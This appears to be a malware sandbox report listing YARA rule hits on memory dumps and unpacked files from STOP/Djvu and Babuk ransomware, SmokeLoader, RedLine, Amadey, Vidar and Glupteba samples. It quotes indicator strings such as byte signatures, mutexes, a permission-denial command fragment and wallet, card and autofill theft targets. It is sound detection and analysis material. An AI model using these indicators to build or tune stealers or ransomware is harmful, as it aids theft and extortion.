00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000000.00000003.2056202136.0000000000850000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000026.00000002.2803018648.00000000008E8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x754d:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000005.00000003.2316367410.0000000000770000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000017.00000002.4498779959.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.4498779959.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7400:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000002.2123714329.00000000008EA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7487:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000002C.00000002.2965262411.0000000000677000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002B.00000002.2816735837.0000000000891000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000023.00000000.2656436321.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000000.2656436321.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7400:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002C.00000002.2966408279.0000000002456000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2370645961.0000000000760000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2558233012.0000000002263000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000002.2644967918.0000000002231000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x244:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000023.00000002.2658515111.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000002.2658515111.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7400:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 958B.exe PID: 3636	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 3636	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3105c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 958B.exe PID: 4708	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 4708	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x46f13:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 958B.exe PID: 5664	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 5664	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x43b75:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: AppLaunch.exe PID: 2352	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 2352	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 958B.exe PID: 3292	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 3292	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x35b32:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: yiueea.exe PID: 5596	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Process Memory Space: 958B.exe PID: 3848	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 3848	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 3848	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x5dbe8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 958B.exe PID: 3648	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 3648	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 3648	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4bda0:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 958B.exe PID: 4416	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 4416	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x443ca:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 958B.exe PID: 4280	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 4280	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x43429:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 2899.exe PID: 4208	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Process Memory Space: build2.exe PID: 4712	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 958B.exe PID: 5788	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 958B.exe PID: 5788	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x34f41:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: build2.exe PID: 5428	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 5428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build2.exe PID: 5428	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x147576:$a1: BinanceChainWallet 0x2543e:$a2: wallet.dat 0x2ada6b:$a3: SOFTWARE\monero-project\monero-core 0x19f11:$b1: CC\%s_%s.txt 0x19f57:$b1: CC\%s_%s.txt 0x1948b:$b2: History\%s_%s.txt 0x19940:$b2: History\%s_%s.txt 0x19477:$b3: Autofill\%s_%s.txt 0x1992d:$b3: Autofill\%s_%s.txt
Click to see the 101 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.840e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
38.3.F3CC.exe.850000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
35.2.yiueea.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
35.2.yiueea.exe.190000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
5.3.vusretg.770000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
44.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
22.0.C5F5.exe.a20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.0.C5F5.exe.a20000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
5.2.vusretg.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.958B.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
36.2.958B.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
36.2.958B.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
39.2.958B.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
39.2.958B.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
39.2.958B.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
43.2.958B.exe.23215a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
43.2.958B.exe.23215a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
43.2.958B.exe.23215a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.958B.exe.23f15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.958B.exe.23f15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
7.2.958B.exe.23f15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
37.2.958B.exe.23a15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
37.2.958B.exe.23a15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
37.2.958B.exe.23a15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
43.2.958B.exe.23215a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
43.2.958B.exe.23215a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
43.2.958B.exe.23215a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
20.2.958B.exe.23d15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
20.2.958B.exe.23d15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
20.2.958B.exe.23d15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.958B.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.958B.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
8.2.958B.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.958B.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.958B.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
